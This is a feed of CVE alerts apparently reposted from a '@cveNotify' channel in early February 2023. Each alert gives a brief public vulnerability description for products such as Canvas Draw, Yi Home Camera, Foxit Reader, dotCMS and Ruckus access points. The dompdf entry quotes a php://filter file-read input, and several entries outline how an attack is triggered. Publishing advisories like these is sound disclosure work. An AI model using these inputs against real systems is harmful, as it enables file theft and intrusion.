🚨 CVE-2018-3858An exploitable heap overflow exists in the TIFF parsing functionality of Canvas Draw version 4.0.0. A specially crafted TIFF image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a TIFF image to trigger this vulnerability and gain the ability to execute code. A different vulnerability than CVE-2018-3857.🎖@cveNotify |
|
| 2023-02-02 22:30:02 |
🚨 CVE-2018-3871An exploitable out-of-bounds write exists in the PCX parsing functionality of Canvas Draw version 4.0.0. A specially crafted PCX image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a PCX image to trigger this vulnerability and gain code execution. A different vulnerability than CVE-2018-3870.🎖@cveNotify |
|
| 2023-02-02 22:30:01 |
🚨 CVE-2018-3859An exploitable out-of-bounds write exists in the TIFF parsing functionality of Canvas Draw version 4.0.0. A specially crafted TIFF image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a TIFF image to trigger this vulnerability and gain code execution. A different vulnerability than CVE-2018-3860.🎖@cveNotify |
|
| 2023-02-02 22:29:59 |
🚨 CVE-2015-5189A race condition was found in the way the pcsd web UI backend performed authorization of user requests. An attacker could use this flaw to send a request that would be evaluated as originating from a different user, potentially allowing the attacker to perform actions with permissions of a more privileged user.🎖@cveNotify |
|
| 2023-02-02 22:29:58 |
🚨 CVE-2015-3258A heap-based buffer overflow was discovered in the way the texttopdf utility of cups-filter processed print jobs with a specially crafted line size. An attacker able to submit print jobs could use this flaw to crash texttopdf or, possibly, execute arbitrary code with the privileges of the "lp" user.🎖@cveNotify |
|
| 2023-02-02 22:29:57 |
🚨 CVE-2015-5195It was found that ntpd would exit with a segmentation fault when a statistics type that was not enabled during compilation (e.g. timingstats) was referenced by the statistics or filegen configuration command.🎖@cveNotify |
|
| 2023-02-02 22:29:56 |
🚨 CVE-2015-5194It was found that ntpd could crash due to an uninitialized variable when processing malformed logconfig configuration commands.🎖@cveNotify |
|
| 2023-02-02 22:29:55 |
🚨 CVE-2015-5188It was discovered that when uploading a file using a multipart/form-data submission to the EAP Web Console, the Console was vulnerable to Cross-Site Request Forgery (CSRF). This meant that an attacker could use the flaw together with a forgery attack to make changes to an authenticated instance.🎖@cveNotify |
|
| 2023-02-02 22:29:53 |
🚨 CVE-2015-3204A flaw was discovered in the way Libreswan's IKE daemon processed certain IKEv1 payloads. A remote attacker could send specially crafted IKEv1 payloads that, when processed, would lead to a denial of service (daemon crash).🎖@cveNotify |
|
| 2023-02-02 22:29:52 |
🚨 CVE-2015-3239An off-by-one array indexing error was found in the libunwind API, which could cause an error when reading untrusted binaries or dwarf debug info data. Red Hat products do not call the API in this way; and it is unlikely that any exploitable attack vector exists in current builds or supported usage.🎖@cveNotify |
|
| 2023-02-02 22:29:51 |
🚨 CVE-2015-5180CVE-2015-5180 glibc: DNS resolver NULL pointer dereference with crafted record type🎖@cveNotify |
|
| 2023-02-02 22:29:50 |
🚨 CVE-2015-3281An implementation error related to the memory management of request and responses was found within HAProxy's buffer_slow_realign() function. An unauthenticated remote attacker could possibly use this flaw to leak certain memory buffer contents from a past request or session.🎖@cveNotify |
|
| 2023-02-02 22:29:49 |
🚨 CVE-2015-3235It was discovered that in Foreman the edit_users permissions (for example, granted to the Manager role) allowed the user to edit admin user passwords. An attacker with the edit_users permissions could use this flaw to access an admin user account, leading to an escalation of privileges.🎖@cveNotify |
|
| 2023-02-02 22:29:48 |
🚨 CVE-2015-3245It was found that libuser, as used by the chfn userhelper functionality, did not properly filter out newline characters in GECOS fields. A local, authenticated user could use this flaw to corrupt the /etc/passwd file, resulting in a denial-of-service on the system.🎖@cveNotify |
|
| 2023-02-02 22:29:46 |
🚨 CVE-2015-3241A denial of service flaw was found in the OpenStack Compute (nova) instance migration process. Because the migration process does not terminate when an instance is deleted, an authenticated user could bypass user quota and deplete all available disk space by repeatedly re-sizing and deleting an instance.🎖@cveNotify |
|
| 2023-02-02 22:29:43 |
🚨 CVE-2015-3150It was discovered that the abrt-dbus D-Bus service did not properly check the validity of the problem directory argument in the ChownProblemDir, DeleteElement, and DeleteProblem methods. A local attacker could use this flaw take ownership of arbitrary files and directories, or to delete files and directories as the root user.🎖@cveNotify |
|
| 2023-02-02 19:29:43 |
🚨 CVE-2022-41684A heap out of bounds read vulnerability exists in the OpenImageIO master-branch-9aeece7a when parsing the image file directory part of a PSD image file. A specially-crafted .psd file can cause a read of arbitrary memory address which can lead to denial of service. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-02-02 19:29:39 |
🚨 CVE-2022-41028Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer overflow is in the function that manages the 'no vpn schedule name1 WORD name2 WORD policy (failover|backup) description (WORD|null)' command template.🎖@cveNotify |
|
| 2023-02-02 19:29:38 |
🚨 CVE-2022-41029Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer overflow is in the function that manages the 'wlan filter mac address WORD descript WORD' command template.🎖@cveNotify |
|
| 2023-02-02 19:29:37 |
🚨 CVE-2022-41639A heap based buffer overflow vulnerability exists in tile decoding code of TIFF image parser in OpenImageIO master-branch-9aeece7a and v2.3.19.0. A specially-crafted TIFF file can lead to an out of bounds memory corruption, which can result in arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-02-02 19:29:36 |
🚨 CVE-2022-32827A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 16, macOS Ventura 13. An app may be able to cause a denial-of-service.🎖@cveNotify |
|
| 2023-02-02 18:29:56 |
🚨 CVE-2023-24457A cross-site request forgery (CSRF) vulnerability in Jenkins Keycloak Authentication Plugin 2.3.0 and earlier allows attackers to trick users into logging in to the attacker's account.🎖@cveNotify |
|
| 2023-02-02 18:29:55 |
🚨 CVE-2023-24493A formula injection vulnerability exists in Tenable.sc due to improper validation of user-supplied input before returning it to users. An authenticated attacker could leverage the reporting system to export reports containing formulas, which would then require a victim to approve and execute on a host.🎖@cveNotify |
|
| 2023-02-02 18:29:54 |
🚨 CVE-2023-24494A stored cross-site scripting (XSS) vulnerability exists in Tenable.sc due to improper validation of user-supplied input before returning it to users. An authenticated, remote attacker can exploit this by convincing a user to click a specially crafted URL, to execute arbitrary script code in a user's browser session.🎖@cveNotify |
|
| 2023-02-02 18:29:50 |
🚨 CVE-2018-25078man-db before 2.8.5 on Gentoo allows local users (with access to the man user account) to gain root privileges because /usr/bin/mandb is executed by root but not owned by root. (Also, the owner can strip the setuid and setgid bits.)🎖@cveNotify |
|
| 2023-02-02 18:29:49 |
🚨 CVE-2023-0650A vulnerability was found in YAFNET up to 3.1.11 and classified as problematic. This issue affects some unknown processing of the component Signature Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.1.12 is able to address this issue. The name of the patch is a1442a2bacc3335461b44c250e81f8d99c60735f. It is recommended to upgrade the affected component. The identifier VDB-220037 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-02 18:29:48 |
🚨 CVE-2023-0651A vulnerability was found in FastCMS 0.1.0. It has been classified as critical. Affected is an unknown function of the component Template Management. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-220038 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-02 18:29:44 |
🚨 CVE-2023-23128** DISPUTED ** Connectwise Control 22.8.10013.8329 is vulnerable to Cross Origin Resource Sharing (CORS). The vendor's position is that two endpoints have Access-Control-Allow-Origin wildcarding to support product functionality, and that there is no risk from this behavior. The vulnerability report is thus not valid.🎖@cveNotify |
|
| 2023-02-02 18:29:43 |
🚨 CVE-2022-2850A flaw was found In 389-ds-base. When the Content Synchronization plugin is enabled, an authenticated user can reach a NULL pointer dereference using a specially crafted query. This flaw allows an authenticated attacker to cause a denial of service.🎖@cveNotify |
|
| 2023-02-02 18:29:39 |
🚨 CVE-2022-2739The version of podman as released for Red Hat Enterprise Linux 7 Extras via RHSA-2022:2190 advisory included an incorrect version of podman missing the fix for CVE-2020-14370, which was previously fixed via RHSA-2020:5056. This issue could possibly allow an attacker to gain access to sensitive information stored in environment variables.🎖@cveNotify |
|
| 2023-02-02 18:29:38 |
🚨 CVE-2022-2211A vulnerability was found in libguestfs. This issue occurs while calculating the greatest possible number of matching keys in the get_keys() function. This flaw leads to a denial of service, either by mistake or malicious actor.🎖@cveNotify |
|
| 2023-02-02 18:29:37 |
🚨 CVE-2020-25678A flaw was found in Ceph where Ceph stores mgr module passwords in clear text. This issue can be found by searching the mgr logs for Grafana and dashboard, with passwords visible. The highest threat from this vulnerability is to confidentiality.🎖@cveNotify |
|
| 2023-02-02 16:30:10 |
🚨 CVE-2016-9922CVE-2016-9921 CVE-2016-9922 Qemu: display: cirrus_vga: a divide by zero in cirrus_do_copy🎖@cveNotify |
|
| 2023-02-02 16:30:09 |
🚨 CVE-2016-3107It was found that the private key for the node certificate was contained in a world-readable file. A local user could possibly use this flaw to gain access to the private key information in the file.🎖@cveNotify |
|
| 2023-02-02 16:30:08 |
🚨 CVE-2011-3609CVE-2011-3609 JBoss AS: CSRF in the administration console & HTTP management API🎖@cveNotify |
|
| 2023-02-02 16:30:06 |
🚨 CVE-2015-3247A race condition flaw, leading to a heap-based memory corruption, was found in spice's worker_update_monitors_config() function, which runs under the QEMU-KVM context on the host. A user in a guest could leverage this flaw to crash the host QEMU-KVM process or, possibly, execute arbitrary code with the privileges of the host QEMU-KVM process.🎖@cveNotify |
|
| 2023-02-02 16:30:05 |
🚨 CVE-2017-15097Privilege escalation flaws were found in the Red Hat initialization scripts of PostgreSQL. An attacker with access to the postgres user account could use these flaws to obtain root access on the server machine.🎖@cveNotify |
|
| 2023-02-02 16:30:04 |
🚨 CVE-2012-3386It was found that the distcheck rule in Automake-generated Makefiles made a directory world-writable when preparing source archives. If a malicious, local user could access this directory, they could execute arbitrary code with the privileges of the user running "make distcheck".🎖@cveNotify |
|
| 2023-02-02 16:30:02 |
🚨 CVE-2016-3693A flaw was found in the provisioning template handling in foreman. An attacker, with permissions to create templates, can cause internal Rails information to be displayed when it is processed, resulting in potentially sensitive information being disclosed.🎖@cveNotify |
|
| 2023-02-02 16:30:01 |
🚨 CVE-2015-3248It was found that the "/var/lib/openhpi" directory provided by OpenHPI used world-writeable and world-readable permissions. A local user could use this flaw to view, modify, and delete OpenHPI-related data, or even fill up the storage device hosting the /var/lib directory.🎖@cveNotify |
|
| 2023-02-02 16:29:59 |
🚨 CVE-2011-3344CVE-2011-3344 Satellite/Spacewalk: XSS on the Lost Password page🎖@cveNotify |
|
| 2023-02-02 16:29:58 |
🚨 CVE-2011-4127CVE-2011-4127 kernel: possible privilege escalation via SG_IO ioctl🎖@cveNotify |
|
| 2023-02-02 16:29:56 |
🚨 CVE-2018-1111A command injection flaw was found in the NetworkManager integration script included in the DHCP client packages in Red Hat Enterprise Linux. A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol.🎖@cveNotify |
|
| 2023-02-02 16:29:55 |
🚨 CVE-2011-2927CVE-2011-2927 Satellite/Spacewalk: XSS flaw in channels search🎖@cveNotify |
|
| 2023-02-02 16:29:53 |
🚨 CVE-2011-2487A flaw was found in JBoss web services where the services used a weak symmetric encryption protocol, PKCS#1 v1.5. An attacker could use this weakness in chosen-ciphertext attacks to recover the symmetric key and conduct further attacks.🎖@cveNotify |
|
| 2023-02-02 16:29:52 |
🚨 CVE-2012-2386CVE-2012-2386 php: Integer overflow leading to heap-buffer overflow in the Phar extension🎖@cveNotify |
|
| 2023-02-02 16:29:50 |
🚨 CVE-2011-2920CVE-2011-2920 Satellite: XSS flaw(s) in filter handling🎖@cveNotify |
|
| 2023-02-02 16:29:49 |
🚨 CVE-2017-12163An information leak flaw was found in the way SMB1 protocol was implemented by Samba. A malicious client could use this flaw to dump server memory contents to a file on the samba share or to a shared printer, though the exact area of server memory cannot be controlled by the attacker.🎖@cveNotify |
|
| 2023-02-02 16:29:48 |
🚨 CVE-2012-2395CVE-2012-2395 cobbler: command injection flaw in the power management XML-RPC API🎖@cveNotify |
|
| 2023-02-02 16:29:47 |
🚨 CVE-2012-0841CVE-2012-0841 libxml2: hash table collisions CPU usage DoS🎖@cveNotify |
|
| 2023-02-02 16:29:46 |
🚨 CVE-2013-0328CVE-2013-0328 jenkins: XSS🎖@cveNotify |
|
| 2023-02-02 16:29:45 |
🚨 CVE-2014-0197CVE-2014-0197 CFME: CSRF protection vulnerability in referrer header🎖@cveNotify |
|
| 2023-02-02 14:29:40 |
🚨 CVE-2020-24307An issue in mRemoteNG v1.76.20 allows attackers to escalate privileges via a crafted executable file.🎖@cveNotify |
|
| 2023-02-02 14:29:39 |
🚨 CVE-2023-0642Cross-Site Request Forgery (CSRF) in GitHub repository squidex/squidex prior to 7.4.0.🎖@cveNotify |
|
| 2023-02-02 14:29:38 |
🚨 CVE-2014-2383dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.🎖@cveNotify |
|
| 2023-02-02 12:29:50 |
🚨 CVE-2022-2546The All-in-One WP Migration WordPress plugin before 7.63 uses the wrong content type, and does not properly escape the response from the ai1wm_export AJAX action, allowing an attacker to craft a request that when submitted by any visitor will inject arbitrary html or javascript into the response that will be executed in the victims session. Note: This requires knowledge of a static secret key🎖@cveNotify |
|
| 2023-02-02 12:29:49 |
🚨 CVE-2023-0637A vulnerability, which was classified as critical, was found in TRENDnet TEW-811DRU 1.0.10.0. This affects an unknown part of the file wan.asp of the component Web Management Interface. The manipulation leads to memory corruption. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-220017 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-02 12:29:48 |
🚨 CVE-2023-0638A vulnerability has been found in TRENDnet TEW-811DRU 1.0.10.0 and classified as critical. This vulnerability affects unknown code of the component Web Interface. The manipulation leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-220018 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-02 12:29:45 |
🚨 CVE-2023-0639A vulnerability was found in TRENDnet TEW-652BRP 3.04b01 and classified as problematic. This issue affects some unknown processing of the file get_set.ccp of the component Web Management Interface. The manipulation of the argument nextPage leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-220019.🎖@cveNotify |
|
| 2023-02-02 12:29:44 |
🚨 CVE-2023-0641A vulnerability was found in PHPGurukul Employee Leaves Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file changepassword.php. The manipulation of the argument newpassword/confirmpassword leads to weak password requirements. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-220021 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-02 12:29:43 |
🚨 CVE-2022-40269Authentication Bypass by Spoofing vulnerability in Mitsubishi Electric Corporation GOT2000 Series GT27 model versions 01.14.000 to 01.47.000, Mitsubishi Electric Corporation GOT2000 Series GT25 model versions 01.14.000 to 01.47.000 and Mitsubishi Electric Corporation GT SoftGOT2000 versions 1.265B to 1.285X allows a remote unauthenticated attacker to disclose sensitive information from users' browsers or spoof legitimate users by abusing inappropriate HTML attributes.🎖@cveNotify |
|
| 2023-02-02 12:29:39 |
🚨 CVE-2022-33323Active Debug Code vulnerability in robot controller of Mitsubishi Electric Corporation industrial robot MELFA SD/SQ Series and MELFA F-Series allows a remote unauthenticated attacker to gain unauthorized access by authentication bypass through an unauthorized telnet login. As for the affected model names, controller types and firmware versions, see the Mitsubishi Electric's advisory which is listed in [References] section.🎖@cveNotify |
|
| 2023-02-02 12:29:38 |
🚨 CVE-2022-43504Improper authentication vulnerability in WordPress versions prior to 6.0.3 allows a remote unauthenticated attacker to obtain the email address of the user who posted a blog using the WordPress Post by Email Feature. The developer also provides new patched releases for all versions since 3.7.🎖@cveNotify |
|
| 2023-02-02 06:30:00 |
🚨 CVE-2018-3888A memory corruption vulnerability exists in the PCX-parsing functionality of Computerinsel Photoline 20.53. A specially crafted PCX image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a PCX image to trigger this vulnerability and gain code execution.🎖@cveNotify |
|
| 2023-02-02 06:29:59 |
🚨 CVE-2018-3898An exploitable code execution vulnerability exists in the QR code scanning functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted QR Code can cause a buffer overflow, resulting in code execution. The trans_info call can overwrite a buffer of size 0x104, which is more than enough to overflow the return address from the ssid_dst field.🎖@cveNotify |
|
| 2023-02-02 06:29:58 |
🚨 CVE-2018-3899An exploitable code execution vulnerability exists in the QR code scanning functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted QR Code can cause a buffer overflow, resulting in code execution. The trans_info call can overwrite a buffer of size 0x104, which is more than enough to overflow the return address from the password_dst field🎖@cveNotify |
|
| 2023-02-02 06:29:57 |
🚨 CVE-2018-3892An exploitable firmware downgrade vulnerability exists in the time syncing functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted packet can cause a buffer overflow, resulting in code execution. An attacker can intercept and alter network traffic to trigger this vulnerability.🎖@cveNotify |
|
| 2023-02-02 06:29:53 |
🚨 CVE-2018-3910An exploitable code execution vulnerability exists in the cloud OTA setup functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted SSID can cause a command injection, resulting in code execution. An attacker can cause a camera to connect to this SSID to trigger this vulnerability. Alternatively, an attacker can convince a user to connect their camera to this SSID.🎖@cveNotify |
|
| 2023-02-02 06:29:52 |
🚨 CVE-2018-3928An exploitable code execution vulnerability exists in the firmware update functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted set of UDP packets can cause a settings change, resulting in denial of service. An attacker can send a set of packets to trigger this vulnerability.🎖@cveNotify |
|
| 2023-02-02 06:29:51 |
🚨 CVE-2018-3935An exploitable code execution vulnerability exists in the UDP network functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted set of UDP packets can allocate unlimited memory, resulting in denial of service. An attacker can send a set of packets to trigger this vulnerability.🎖@cveNotify |
|
| 2023-02-02 06:29:47 |
🚨 CVE-2018-3934An exploitable code execution vulnerability exists in the firmware update functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted set of UDP packets can cause a logic flaw, resulting in an authentication bypass. An attacker can sniff network traffic and send a set of packets to trigger this vulnerability.🎖@cveNotify |
|
| 2023-02-02 06:29:46 |
🚨 CVE-2018-3966An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's Foxit PDF Reader version 9.1.0.5096. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.🎖@cveNotify |
|
| 2023-02-02 06:29:45 |
🚨 CVE-2018-3965An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's Foxit PDF Reader version 9.1.0.5096. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.🎖@cveNotify |
|
| 2023-02-02 06:29:40 |
🚨 CVE-2018-4005An exploitable privilege escalation vulnerability exists in the Shimo VPN 4.1.5.1 helper service in the configureRoutingWithCommand function. A user with local access can use this vulnerability to raise their privileges to root. An attacker would need local access to the machine for a successful exploit.🎖@cveNotify |
|
| 2023-02-02 06:29:39 |
🚨 CVE-2018-4006An exploitable privilege escalation vulnerability exists in the Shimo VPN 4.1.5.1 helper service in the writeConfig functionality. A non-root user is able to write a file anywhere on the system. A user with local access can use this vulnerability to raise their privileges to root. An attacker would need local access to the machine to exploit it successfully.🎖@cveNotify |
|
| 2023-02-02 06:29:38 |
🚨 CVE-2018-4007An exploitable privilege escalation vulnerability exists in the Shimo VPN 4.1.5.1 helper service in the deleteConfig functionality. The program is able to delete any protected file on the system. An attacker would need local access to the machine to successfully exploit the bug.🎖@cveNotify |
|
| 2023-02-02 06:29:37 |
🚨 CVE-2018-4008An exploitable privilege escalation vulnerability exists in the Shimo VPN 4.1.5.1 helper service in the RunVpncScript command. The command takes a user-supplied script argument and executes it under root context. A user with local access can use this vulnerability to raise their privileges to root. An attacker would need local access to the machine to successfully exploit this bug.🎖@cveNotify |
|
| 2023-02-02 02:29:46 |
🚨 CVE-2023-23969In Django 3.2 before 3.2.17, 4.0 before 4.0.9, and 4.1 before 4.1.6, the parsed values of Accept-Language headers are cached in order to avoid repetitive parsing. This leads to a potential denial-of-service vector via excessive memory usage if the raw value of Accept-Language headers is very large.🎖@cveNotify |
|
| 2023-02-02 02:29:42 |
🚨 CVE-2023-24055** DISPUTED ** KeePass through 2.53 (in a default installation) allows an attacker, who has write access to the XML configuration file, to obtain the cleartext passwords by adding an export trigger. NOTE: the vendor's position is that the password database is not intended to be secure against an attacker who has that level of access to the local PC.🎖@cveNotify |
|
| 2023-02-02 02:29:41 |
🚨 CVE-2022-45213perfSONAR before 4.4.6 inadvertently supports the parse option for a file:// URL.🎖@cveNotify |
|
| 2023-02-02 02:29:40 |
🚨 CVE-2022-37034In dotCMS 5.x-22.06, it is possible to call the TempResource multiple times, each time requesting the dotCMS server to download a large file. If done repeatedly, this will result in Tomcat request-thread exhaustion and ultimately a denial of any other requests.🎖@cveNotify |
|
| 2023-02-02 02:29:39 |
🚨 CVE-2023-0599Rapid7 Metasploit Pro versions 4.21.2 and lower suffer from a stored cross site scripting vulnerability, due to a lack of JavaScript request string sanitization. Using this vulnerability, an authenticated attacker can execute arbitrary HTML and script code in the target browser against another Metasploit Pro user using a specially crafted request. Note that in most deployments, all Metasploit Pro users tend to enjoy privileges equivalent to local administrator.🎖@cveNotify |
|
| 2023-02-02 00:30:02 |
🚨 CVE-2022-37033In dotCMS 5.x-22.06, TempFileAPI allows a user to create a temporary file based on a passed in URL, while attempting to block any SSRF access to local IP addresses or private subnets. In resolving this URL, the TempFileAPI follows any 302 redirects that the remote URL returns. Because there is no re-validation of the redirect URL, the TempFileAPI can be used to return data from those local/private hosts that should not be accessible remotely.🎖@cveNotify |
|
| 2023-02-02 00:30:00 |
🚨 CVE-2022-3913Rapid7 Nexpose and InsightVM versions 6.6.82 through 6.6.177 fail to validate the certificate of the update server when downloading updates. This failure could allow an attacker in a privileged position on the network to provide their own HTTPS endpoint, or intercept communications to the legitimate endpoint. The attacker would need some pre-existing access to at least one node on the network path between the Rapid7-controlled update server and the Nexpose/InsightVM application, and the ability to either spoof the update server's FQDN or redirect legitimate traffic to the attacker's server in order to exploit this vulnerability. Note that even in this scenario, an attacker could not normally replace an update package with a malicious package, since the update process validates a separate, code-signing certificate, distinct from the HTTPS certificate used for communication. This issue was resolved on February 1, 2023 in update 6.6.178 of Nexpose and InsightVM.🎖@cveNotify |
|
| 2023-02-02 00:29:57 |
🚨 CVE-2022-45782An issue was discovered in dotCMS core 5.3.8.5 through 5.3.8.15 and 21.03 through 22.10.1. A cryptographically insecure random generation algorithm for password-reset token generation leads to account takeover.🎖@cveNotify |
|
| 2023-02-02 00:29:56 |
🚨 CVE-2022-45783An issue was discovered in dotCMS core 4.x through 22.10.2. An authenticated directory traversal vulnerability in the dotCMS API can lead to Remote Code Execution.🎖@cveNotify |
|
| 2023-02-02 00:29:54 |
🚨 CVE-2022-47872maccms10 2021.1000.2000 is vulnerable to Server-side request forgery (SSRF).🎖@cveNotify |
|
| 2023-02-02 00:29:52 |
🚨 CVE-2023-23750An issue was discovered in Joomla! 4.0.0 through 4.2.6. A missing token check causes a CSRF vulnerability in the handling of post-installation messages.🎖@cveNotify |
|
| 2023-02-02 00:29:50 |
🚨 CVE-2023-23751An issue was discovered in Joomla! 4.0.0 through 4.2.4. A missing ACL check allows non super-admin users to access com_actionlogs.🎖@cveNotify |
|
| 2023-02-02 00:29:49 |
🚨 CVE-2020-22662In Ruckus R310 10.5.1.0.199, Ruckus R500 10.5.1.0.199, Ruckus R600 10.5.1.0.199, Ruckus T300 10.5.1.0.199, Ruckus T301n 10.5.1.0.199, Ruckus T301s 10.5.1.0.199, SmartCell Gateway 200 (SCG200) before 3.6.2.0.795, SmartZone 100 (SZ-100) before 3.6.2.0.795, SmartZone 300 (SZ300) before 3.6.2.0.795, Virtual SmartZone (vSZ) before 3.6.2.0.795, ZoneDirector 1100 9.10.2.0.130, ZoneDirector 1200 10.2.1.0.218, ZoneDirector 3000 10.2.1.0.218, ZoneDirector 5000 10.0.1.0.151, a vulnerability allows attackers to change and set unauthorized "illegal region code" by remote code Execution command injection which leads to run illegal frequency with maxi output power. Vulnerability allows attacker to create an arbitrary amount of ssid wlans interface per radio which creates overhead over noise (the default max limit is 8 ssid only per radio in solo AP). Vulnerability allows attacker to unlock hidden regions by privilege command injection in WEB GUI.🎖@cveNotify |
|
| 2023-02-02 00:29:47 |
🚨 CVE-2020-22661In Ruckus R310 10.5.1.0.199, Ruckus R500 10.5.1.0.199, Ruckus R600 10.5.1.0.199, Ruckus T300 10.5.1.0.199, Ruckus T301n 10.5.1.0.199, Ruckus T301s 10.5.1.0.199, SmartCell Gateway 200 (SCG200) before 3.6.2.0.795, SmartZone 100 (SZ-100) before 3.6.2.0.795, SmartZone 300 (SZ300) before 3.6.2.0.795, Virtual SmartZone (vSZ) before 3.6.2.0.795, ZoneDirector 1100 9.10.2.0.130, ZoneDirector 1200 10.2.1.0.218, ZoneDirector 3000 10.2.1.0.218, ZoneDirector 5000 10.0.1.0.151, a vulnerability allows attackers to erase the backup secondary official image and write secondary backup unauthorized image.🎖@cveNotify |
|
| 2023-02-02 00:29:44 |
🚨 CVE-2020-22660In Ruckus R310 10.5.1.0.199, Ruckus R500 10.5.1.0.199, Ruckus R600 10.5.1.0.199, Ruckus T300 10.5.1.0.199, Ruckus T301n 10.5.1.0.199, Ruckus T301s 10.5.1.0.199, SmartCell Gateway 200 (SCG200) before 3.6.2.0.795, SmartZone 100 (SZ-100) before 3.6.2.0.795, SmartZone 300 (SZ300) before 3.6.2.0.795, Virtual SmartZone (vSZ) before 3.6.2.0.795, ZoneDirector 1100 9.10.2.0.130, ZoneDirector 1200 10.2.1.0.218, ZoneDirector 3000 10.2.1.0.218, ZoneDirector 5000 10.0.1.0.151, a vulnerability allows attackers to force bypass Secure Boot failed attempts and run temporarily the previous Backup image.🎖@cveNotify |
|
| 2023-02-02 00:29:43 |
🚨 CVE-2022-30904In Bestechnic Bluetooth Mesh SDK (BES2300) V1.0, a buffer overflow vulnerability can be triggered during provisioning, because there is no check for the SegN field of the Transaction Start PDU.🎖@cveNotify |
|
| 2023-02-02 00:29:41 |
🚨 CVE-2022-31363Cypress : https://www.infineon.com/ Cypress Bluetooth Mesh SDK BSA0107_05.01.00-BX8-AMESH-08 is affected by: Buffer Overflow. The impact is: execute arbitrary code (remote). The component is: affected function is pb_transport_handle_frag_. ¶¶ In Cypress Bluetooth Mesh SDK, there is an out-of-bound write vulnerability that can be triggered during mesh provisioning. Because there is no check for mismatched SegN and TotalLength in Transaction Start PDU.🎖@cveNotify |
|
| 2023-02-02 00:29:39 |
🚨 CVE-2022-31364Cypress : https://www.infineon.com/ Cypress Bluetooth Mesh SDK BSA0107_05.01.00-BX8-AMESH-08 is affected by: Buffer Overflow. The impact is: execute arbitrary code (remote). The component is: affected function is lower_transport_layer_on_seg. ¶¶ In Cypress Bluetooth Mesh SDK, there is an out-of-bound write vulnerability that can be triggered by sending a series of segmented packets with inconsistent SegN.🎖@cveNotify |
|
| 2023-02-02 00:29:38 |
🚨 CVE-2022-3083All versions of Landis+Gyr E850 (ZMQ200) are vulnerable to CWE-784: Reliance on Cookies Without Validation and Integrity. The device's web application navigation depends on the value of the session cookie. The web application could become inaccessible for the user if an attacker changes the cookie values.🎖@cveNotify |
|
| 2023-02-01 21:30:02 |
🚨 CVE-2022-27508Unauthenticated denial of service🎖@cveNotify |
|
| 2023-02-01 21:30:01 |
🚨 CVE-2022-27507Authenticated denial of service🎖@cveNotify |
|
| 2023-02-01 21:30:00 |
🚨 CVE-2019-4716IBM Planning Analytics 2.0.0 through 2.0.8 is vulnerable to a configuration overwrite that allows an unauthenticated user to login as "admin", and then execute code as root or SYSTEM via TM1 scripting. IBM X-Force ID: 172094.🎖@cveNotify |
|
| 2023-02-01 21:29:59 |
🚨 CVE-2023-24166Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/formWifiBasicSet.🎖@cveNotify |
|
| 2023-02-01 21:29:58 |
🚨 CVE-2019-14465fmt_mtm_load_song in fmt/mtm.c in Schism Tracker 20190722 has a heap-based buffer overflow.🎖@cveNotify |
|
| 2023-02-01 21:29:54 |
🚨 CVE-2019-9904An issue was discovered in lib\cdt\dttree.c in libcdt.a in graphviz 2.40.1. Stack consumption occurs because of recursive agclose calls in lib\cgraph\graph.c in libcgraph.a, related to agfstsubg in lib\cgraph\subg.c.🎖@cveNotify |
|
| 2023-02-01 21:29:53 |
🚨 CVE-2023-24169Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/FUN_0007343c.🎖@cveNotify |
|
| 2023-02-01 21:29:52 |
